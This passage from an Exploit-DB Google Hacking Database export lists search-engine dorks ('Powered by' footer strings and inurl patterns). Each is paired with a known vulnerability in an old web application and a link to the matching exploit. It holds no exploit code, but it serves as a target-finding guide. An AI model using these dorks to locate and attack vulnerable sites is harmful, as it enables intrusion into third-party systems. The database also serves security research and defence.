<querystring>https://www.google.com/search?q=Powered+by+Dayfox+Designs+This+is+a+port+of+WordPress</querystring>
<edb>https://www.exploit-db.com/exploits/6203</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2882</id>
<link>https://www.exploit-db.com/ghdb/2882</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by dB Masters' Curium CMS 1</shortDescription>
<textualDescription>dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: https://www.exploit-db.com/exploits/3256</textualDescription>
<query>Powered by dB Masters' Curium CMS 1</query>
<querystring>https://www.google.com/search?q=Powered+by+dB+Masters%27+Curium+CMS+1</querystring>
<edb>https://www.exploit-db.com/exploits/3256</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3144</id>
<link>https://www.exploit-db.com/ghdb/3144</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Digital College 1.0 - Magtrb Soft 2010</shortDescription>
<textualDescription>Digital College 1.0 Upload Vulnerability: https://www.exploit-db.com/exploits/12568</textualDescription>
<query>Powered by Digital College 1.0 - Magtrb Soft 2010</query>
<querystring>https://www.google.com/search?q=Powered+by+Digital+College+1.0+-+Magtrb+Soft+2010</querystring>
<edb>https://www.exploit-db.com/exploits/12568</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2817</id>
<link>https://www.exploit-db.com/ghdb/2817</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org</shortDescription>
<textualDescription>Discuz 1.03 SQL Injection Exploit Vulnerability: https://www.exploit-db.com/exploits/10861</textualDescription>
<query>Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org</query>
<querystring>https://www.google.com/search?q=Powered+by+Discuz!+1.0+%C2%A9+2002,+Crossday+Studio+of+11cn.org</querystring>
<edb>https://www.exploit-db.com/exploits/10861</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3361</id>
<link>https://www.exploit-db.com/ghdb/3361</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Dodo, Bubo &amp; Misty. Feed us!</shortDescription>
<textualDescription>Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: https://www.exploit-db.com/exploits/11460</textualDescription>
<query>Powered by Dodo, Bubo &amp; Misty. Feed us!</query>
<querystring>https://www.google.com/search?q=Powered+by+Dodo,+Bubo+%26+Misty.+Feed+us!</querystring>
<edb>https://www.exploit-db.com/exploits/11460</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2848</id>
<link>https://www.exploit-db.com/ghdb/2848</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Dolphin</shortDescription>
<textualDescription>Dolphin v7.0.3 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15400</textualDescription>
<query>Powered by Dolphin</query>
<querystring>https://www.google.com/search?q=powered+by+dolphin</querystring>
<edb>https://www.exploit-db.com/exploits/15400</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3225</id>
<link>https://www.exploit-db.com/ghdb/3225</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by DorsaCms</shortDescription>
<textualDescription>DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6810</textualDescription>
<query>Powered by DorsaCms</query>
<querystring>https://www.google.com/search?q=Powered+by+DorsaCms</querystring>
<edb>https://www.exploit-db.com/exploits/6810</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2413</id>
<link>https://www.exploit-db.com/ghdb/2413</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by Dreampics Builder</shortDescription>
<textualDescription>Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: https://www.exploit-db.com/exploits/6034</textualDescription>
<query>powered by Dreampics Builder</query>
<querystring>https://www.google.com/search?q=powered+by+Dreampics+Builder</querystring>
<edb>https://www.exploit-db.com/exploits/6034</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2061</id>
<link>https://www.exploit-db.com/ghdb/2061</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by DUdforum 3.0 inurl:/forums.asp?iFor=</shortDescription>
<textualDescription>DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5894</textualDescription>
<query>Powered by DUdforum 3.0 inurl:/forums.asp?iFor=</query>
<querystring>https://www.google.com/search?q=Powered+by+DUdforum+3.0+++++inurl:/forums.asp%3FiFor%3D</querystring>
<edb>https://www.exploit-db.com/exploits/5894</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2907</id>
<link>https://www.exploit-db.com/ghdb/2907</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by EasySiteNetwork</shortDescription>
<textualDescription>Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: https://www.exploit-db.com/exploits/4770</textualDescription>
<query>Powered by EasySiteNetwork</query>
<querystring>https://www.google.com/search?q=Powered+by+EasySiteNetwork</querystring>
<edb>https://www.exploit-db.com/exploits/4770</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2953</id>
<link>https://www.exploit-db.com/ghdb/2953</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by eclime.com</shortDescription>
<textualDescription>eclime v1.1 ByPass / Create and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12279</textualDescription>
<query>Powered by eclime.com</query>
<querystring>https://www.google.com/search?q=Powered+by+eclime.com</querystring>
<edb>https://www.exploit-db.com/exploits/12279</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2828</id>
<link>https://www.exploit-db.com/ghdb/2828</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Egorix</shortDescription>
<textualDescription>EPOLL SYSTEM 3.1 (password.dat) Disclosure: https://www.exploit-db.com/exploits/7864</textualDescription>
<query>Powered by Egorix</query>
<querystring>https://www.google.com/search?q=Powered+by+Egorix</querystring>
<edb>https://www.exploit-db.com/exploits/7864</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2916</id>
<link>https://www.exploit-db.com/ghdb/2916</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By eLitius 1.0</shortDescription>
<textualDescription>eLitius 1.0 Arbitrary Database Backup: https://www.exploit-db.com/exploits/8498</textualDescription>
<query>Powered By eLitius 1.0</query>
<querystring>https://www.google.com/search?q=Powered+By+eLitius+1.0</querystring>
<edb>https://www.exploit-db.com/exploits/8498</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3029</id>
<link>https://www.exploit-db.com/ghdb/3029</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by eLitius Version 1.0</shortDescription>
<textualDescription>eLitius 1.0 (manage-admin.php) Add Admin/Change Password: https://www.exploit-db.com/exploits/8459</textualDescription>
<query>Powered by eLitius Version 1.0</query>
<querystring>https://www.google.com/search?q=Powered+by+eLitius+Version+1.0</querystring>
<edb>https://www.exploit-db.com/exploits/8459</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2932</id>
<link>https://www.exploit-db.com/ghdb/2932</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by eLitius Version 1.0</shortDescription>
<textualDescription>eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: https://www.exploit-db.com/exploits/8563</textualDescription>
<query>Powered by eLitius Version 1.0</query>
<querystring>https://www.google.com/search?q=Powered+by+eLitius+Version+1.0</querystring>
<edb>https://www.exploit-db.com/exploits/8563</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3338</id>
<link>https://www.exploit-db.com/ghdb/3338</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Elvin Bug Tracking Server.</shortDescription>
<textualDescription>Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: https://www.exploit-db.com/exploits/8953</textualDescription>
<query>Powered by Elvin Bug Tracking Server.</query>
<querystring>https://www.google.com/search?q=Powered+by+Elvin+Bug+Tracking+Server.</querystring>
<edb>https://www.exploit-db.com/exploits/8953</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2356</id>
<link>https://www.exploit-db.com/ghdb/2356</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by emuCMS</shortDescription>
<textualDescription>emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: https://www.exploit-db.com/exploits/5878</textualDescription>
<query>Powered by emuCMS</query>
<querystring>https://www.google.com/search?q=Powered+by+emuCMS</querystring>
<edb>https://www.exploit-db.com/exploits/5878</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1790</id>
<link>https://www.exploit-db.com/ghdb/1790</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by ephpscripts</shortDescription>
<textualDescription>E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: https://www.exploit-db.com/exploits/6398</textualDescription>
<query>Powered by ephpscripts</query>
<querystring>https://www.google.com/search?q=Powered+by+ephpscripts</querystring>
<edb>https://www.exploit-db.com/exploits/6398</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2928</id>
<link>https://www.exploit-db.com/ghdb/2928</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by ExoPHPDesk v1.2 Final.</shortDescription>
<textualDescription>ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: https://www.exploit-db.com/exploits/3234</textualDescription>
<query>Powered by ExoPHPDesk v1.2 Final.</query>
<querystring>https://www.google.com/search?q=Powered+by+ExoPHPDesk+v1.2+Final.</querystring>
<edb>https://www.exploit-db.com/exploits/3234</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2913</id>
<link>https://www.exploit-db.com/ghdb/2913</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Fantastic News v2.1.4</shortDescription>
<textualDescription>Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/3027</textualDescription>
<query>Powered by Fantastic News v2.1.4</query>
<querystring>https://www.google.com/search?q=Powered+by+Fantastic+News+v2.1.4</querystring>
<edb>https://www.exploit-db.com/exploits/3027</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2895</id>
<link>https://www.exploit-db.com/ghdb/2895</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Flinx</shortDescription>
<textualDescription>flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: https://www.exploit-db.com/exploits/4985</textualDescription>
<query>Powered by Flinx</query>
<querystring>https://www.google.com/search?q=Powered+by+Flinx</querystring>
<edb>https://www.exploit-db.com/exploits/4985</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2393</id>
<link>https://www.exploit-db.com/ghdb/2393</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by FluentCMS</shortDescription>
<textualDescription>FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: https://www.exploit-db.com/exploits/5509</textualDescription>
<query>Powered by FluentCMS</query>
<querystring>https://www.google.com/search?q=Powered+by+FluentCMS</querystring>
<edb>https://www.exploit-db.com/exploits/5509</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2502</id>
<link>https://www.exploit-db.com/ghdb/2502</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By form2list</shortDescription>
<textualDescription>form2list (page.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8348</textualDescription>
<query>Powered By form2list</query>
<querystring>https://www.google.com/search?q=Powered+By+form2list</querystring>
<edb>https://www.exploit-db.com/exploits/8348</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3297</id>
<link>https://www.exploit-db.com/ghdb/3297</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Forums W-Agora</shortDescription>
<textualDescription>W-Agora v.4.2.1 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10999</textualDescription>
<query>Powered by Forums W-Agora</query>
<querystring>https://www.google.com/search?q=Powered+by+Forums+W-Agora</querystring>
<edb>https://www.exploit-db.com/exploits/10999</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1926</id>
<link>https://www.exploit-db.com/ghdb/1926</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by free simple software </shortDescription>
<textualDescription>Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: https://www.exploit-db.com/exploits/14672</textualDescription>
<query>Powered by free simple software</query>
<querystring>https://www.google.com/search?q=Powered+by+free+simple+software</querystring>
<edb>https://www.exploit-db.com/exploits/14672</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3262</id>
<link>https://www.exploit-db.com/ghdb/3262</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Gbook MX v4.1.0 ©2003 Magtrb Soft</shortDescription>
<textualDescription>Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10986</textualDescription>
<query>Powered by Gbook MX v4.1.0 ©2003 Magtrb Soft</query>
<querystring>https://www.google.com/search?q=Powered+by+Gbook+MX+v4.1.0+%C2%A92003+Magtrb+Soft</querystring>
<edb>https://www.exploit-db.com/exploits/10986</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1462</id>
<link>https://www.exploit-db.com/ghdb/1462</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by GL-SH DEAF forum 6.5.5 final.</shortDescription>
<textualDescription>PHP Forum ohne My SQL Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10757</textualDescription>
<query>Powered by GL-SH DEAF forum 6.5.5 final.</query>
<querystring>https://www.google.com/search?q=Powered+by+GL-SH+DEAF+forum+6.5.5+final.</querystring>
<edb>https://www.exploit-db.com/exploits/10757</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2983</id>
<link>https://www.exploit-db.com/ghdb/2983</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Guruscript.com</shortDescription>
<textualDescription>Freelancer Marketplace Script Upload Vulnerability: https://www.exploit-db.com/exploits/14390</textualDescription>
<query>Powered by Guruscript.com</query>
<querystring>https://www.google.com/search?q=Powered+by+Guruscript.com</querystring>
<edb>https://www.exploit-db.com/exploits/14390</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3023</id>
<link>https://www.exploit-db.com/ghdb/3023</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Guruscript.com</shortDescription>
<textualDescription>Freelancers Marketplace Script Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/14389</textualDescription>
<query>Powered by Guruscript.com</query>
<querystring>https://www.google.com/search?q=Powered+by+Guruscript.com</querystring>
<edb>https://www.exploit-db.com/exploits/14389</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1449</id>
<link>https://www.exploit-db.com/ghdb/1449</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by hwdVideoShare</shortDescription>
<textualDescription>Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: https://www.exploit-db.com/exploits/5160</textualDescription>
<query>Powered by hwdVideoShare</query>
<querystring>https://www.google.com/search?q=Powered+by+hwdVideoShare</querystring>
<edb>https://www.exploit-db.com/exploits/5160</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3049</id>
<link>https://www.exploit-db.com/ghdb/3049</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by iBoutique v4.0</shortDescription>
<textualDescription>iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: https://www.exploit-db.com/exploits/6444</textualDescription>
<query>Powered by iBoutique v4.0</query>
<querystring>https://www.google.com/search?q=Powered+by+iBoutique+v4.0</querystring>
<edb>https://www.exploit-db.com/exploits/6444</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2240</id>
<link>https://www.exploit-db.com/ghdb/2240</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Info Fisier</shortDescription>
<textualDescription>Info Fisier v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10726</textualDescription>
<query>Powered by Info Fisier</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+Info+Fisier</querystring>
<edb>https://www.exploit-db.com/exploits/10726</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2564</id>
<link>https://www.exploit-db.com/ghdb/2564</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Info Fisier.</shortDescription>
<textualDescription>Info Fisier 1.0 multiple Vulnerabilities: https://www.exploit-db.com/exploits/10728</textualDescription>
<query>Powered by Info Fisier.</query>
<querystring>https://www.google.com/search?q=Powered+by+Info+Fisier.</querystring>
<edb>https://www.exploit-db.com/exploits/10728</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2971</id>
<link>https://www.exploit-db.com/ghdb/2971</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Info Fisier.</shortDescription>
<textualDescription>Info Fisier 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10671</textualDescription>
<query>Powered by Info Fisier.</query>
<querystring>https://www.google.com/search?q=Powered+by+Info+Fisier.</querystring>
<edb>https://www.exploit-db.com/exploits/10671</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2797</id>
<link>https://www.exploit-db.com/ghdb/2797</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by iScripts EasyBiller</shortDescription>
<textualDescription>iScripts easybiller v1.1 sqli vulnerability: https://www.exploit-db.com/exploits/13741</textualDescription>
<query>Powered by iScripts EasyBiller</query>
<querystring>https://www.google.com/search?q=Powered+by+iScripts+EasyBiller</querystring>
<edb>https://www.exploit-db.com/exploits/13741</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3281</id>
<link>https://www.exploit-db.com/ghdb/3281</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by iScripts eSwap.</shortDescription>
<textualDescription>iScripts eSwap v2.0 sqli and xss vulnerability: https://www.exploit-db.com/exploits/13740</textualDescription>
<query>Powered by iScripts eSwap.</query>
<querystring>https://www.google.com/search?q=Powered+by+iScripts+eSwap.</querystring>
<edb>https://www.exploit-db.com/exploits/13740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3083</id>
<link>https://www.exploit-db.com/ghdb/3083</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by iScripts SocialWare</shortDescription>
<textualDescription>Upload Vulnerability and XSS in socialware V2.2: https://www.exploit-db.com/exploits/12448</textualDescription>
<query>Powered by iScripts SocialWare</query>
<querystring>https://www.google.com/search?q=Powered+by+iScripts+SocialWare</querystring>
<edb>https://www.exploit-db.com/exploits/12448</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2365</id>
<link>https://www.exploit-db.com/ghdb/2365</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by iScripts VisualCaster</shortDescription>
<textualDescription>SQli Vulnerability in iScripts VisualCaster - CVE: 2010-2853: https://www.exploit-db.com/exploits/12451</textualDescription>
<query>Powered by iScripts VisualCaster</query>
<querystring>https://www.google.com/search?q=Powered+by+iScripts+VisualCaster</querystring>
<edb>https://www.exploit-db.com/exploits/12451</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2400</id>
<link>https://www.exploit-db.com/ghdb/2400</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by JAF CMS © 2004 - 2006</shortDescription>
<textualDescription>JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: https://www.exploit-db.com/exploits/2474</textualDescription>
<query>powered by JAF CMS © 2004 - 2006</query>
<querystring>https://www.google.com/search?q=powered+by+JAF+CMS+%C2%A9+2004+-+2006</querystring>
<edb>https://www.exploit-db.com/exploits/2474</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1779</id>
<link>https://www.exploit-db.com/ghdb/1779</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Jewelry Cart Software</shortDescription>
<textualDescription>Jewelry Cart Software (product.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11826</textualDescription>
<query>Powered by Jewelry Cart Software</query>
<querystring>https://www.google.com/search?q=Powered+by+Jewelry+Cart+Software</querystring>
<edb>https://www.exploit-db.com/exploits/11826</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2565</id>
<link>https://www.exploit-db.com/ghdb/2565</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by joovili</shortDescription>
<textualDescription>Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: https://www.exploit-db.com/exploits/4799</textualDescription>
<query>powered by joovili</query>
<querystring>https://www.google.com/search?q=powered+by+joovili</querystring>
<edb>https://www.exploit-db.com/exploits/4799</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1660</id>
<link>https://www.exploit-db.com/ghdb/1660</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by jshop</shortDescription>
<textualDescription>Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: https://www.exploit-db.com/exploits/3113</textualDescription>
<query>powered by jshop</query>
<querystring>https://www.google.com/search?q=powered+by+jshop</querystring>
<edb>https://www.exploit-db.com/exploits/3113</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1541</id>
<link>https://www.exploit-db.com/ghdb/1541</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by lineaCMS © 2006 lineaPHP Group</shortDescription>
<textualDescription>lineaCMS Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10736</textualDescription>
<query>Powered by lineaCMS © 2006 lineaPHP Group</query>
<querystring>https://www.google.com/search?q=Powered+by+lineaCMS+%C2%A9+2006+lineaPHP+Group</querystring>
<edb>https://www.exploit-db.com/exploits/10736</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3076</id>
<link>https://www.exploit-db.com/ghdb/3076</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by LiteCommerce</shortDescription>
<textualDescription>litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: https://www.exploit-db.com/exploits/4300</textualDescription>
<query>Powered by LiteCommerce</query>
<querystring>https://www.google.com/search?q=Powered+by+LiteCommerce</querystring>
<edb>https://www.exploit-db.com/exploits/4300</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1881</id>
<link>https://www.exploit-db.com/ghdb/1881</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Maian Cart v1.1</shortDescription>
<textualDescription>Maian Cart 1.1 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6047</textualDescription>
<query>Powered by Maian Cart v1.1</query>
<querystring>https://www.google.com/search?q=Powered+by+Maian+Cart+v1.1</querystring>
<edb>https://www.exploit-db.com/exploits/6047</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2885</id>
<link>https://www.exploit-db.com/ghdb/2885</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Maian Greetings v2.1</shortDescription>
<textualDescription>Maian Greetings v2.1 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11301</textualDescription>
<query>Powered by Maian Greetings v2.1</query>
<querystring>https://www.google.com/search?q=Powered+by+Maian+Greetings+v2.1</querystring>
<edb>https://www.exploit-db.com/exploits/11301</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1977</id>
<link>https://www.exploit-db.com/ghdb/1977</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Maian Guestbook v3.2</shortDescription>
<textualDescription>Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: https://www.exploit-db.com/exploits/6061</textualDescription>
<query>Powered by Maian Guestbook v3.2</query>
<querystring>https://www.google.com/search?q=Powered+by+Maian+Guestbook+v3.2</querystring>
<edb>https://www.exploit-db.com/exploits/6061</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1971</id>
<link>https://www.exploit-db.com/ghdb/1971</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Maian Weblog v4.0</shortDescription>
<textualDescription>Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: https://www.exploit-db.com/exploits/6064</textualDescription>
<query>Powered by Maian Weblog v4.0</query>
<querystring>https://www.google.com/search?q=Powered+by+Maian+Weblog+v4.0</querystring>
<edb>https://www.exploit-db.com/exploits/6064</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3179</id>
<link>https://www.exploit-db.com/ghdb/3179</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Marinet</shortDescription>
<textualDescription>Marinet cms SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12577</textualDescription>
<query>Powered by Marinet</query>
<querystring>https://www.google.com/search?q=Powered+by+Marinet</querystring>
<edb>https://www.exploit-db.com/exploits/12577</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2970</id>
<link>https://www.exploit-db.com/ghdb/2970</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by MetInfo 3.0</shortDescription>
<textualDescription>Metinfo v3.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15496</textualDescription>
<query>Powered by MetInfo 3.0</query>
<querystring>https://www.google.com/search?q=Powered+by+MetInfo+3.0</querystring>
<edb>https://www.exploit-db.com/exploits/15496</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3136</id>
<link>https://www.exploit-db.com/ghdb/3136</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by minb</shortDescription>
<textualDescription>minb 0.1.0 Remote Code Execution - CVE: 2008-7005: https://www.exploit-db.com/exploits/6432</textualDescription>
<query>Powered by minb</query>
<querystring>https://www.google.com/search?q=Powered+by+minb</querystring>
<edb>https://www.exploit-db.com/exploits/6432</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1928</id>
<link>https://www.exploit-db.com/ghdb/1928</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Minerva 237</shortDescription>
<textualDescription>Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: https://www.exploit-db.com/exploits/1908</textualDescription>
<query>Powered by Minerva 237</query>
<querystring>https://www.google.com/search?q=Powered+by+Minerva+237</querystring>
<edb>https://www.exploit-db.com/exploits/1908</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2493</id>
<link>https://www.exploit-db.com/ghdb/2493</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by minimal Gallery 0.8</shortDescription>
<textualDescription>minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: https://www.exploit-db.com/exploits/4902</textualDescription>
<query>powered by minimal Gallery 0.8</query>
<querystring>https://www.google.com/search?q=powered+by+minimal+Gallery+0.8</querystring>
<edb>https://www.exploit-db.com/exploits/4902</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2784</id>
<link>https://www.exploit-db.com/ghdb/2784</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Mitra Informatika Solusindo</shortDescription>
<textualDescription>Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5214</textualDescription>
<query>Powered by Mitra Informatika Solusindo</query>
<querystring>https://www.google.com/search?q=Powered+by++Mitra+Informatika+Solusindo</querystring>
<edb>https://www.exploit-db.com/exploits/5214</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2364</id>
<link>https://www.exploit-db.com/ghdb/2364</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Multi Website 1.5</shortDescription>
<textualDescription>Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: https://www.exploit-db.com/exploits/9344</textualDescription>
<query>Powered by Multi Website 1.5</query>
<querystring>https://www.google.com/search?q=Powered+by+Multi+Website+1.5</querystring>
<edb>https://www.exploit-db.com/exploits/9344</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2044</id>
<link>https://www.exploit-db.com/ghdb/2044</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by MVC-Web CMS inurl:/index.asp?newsid=</shortDescription>
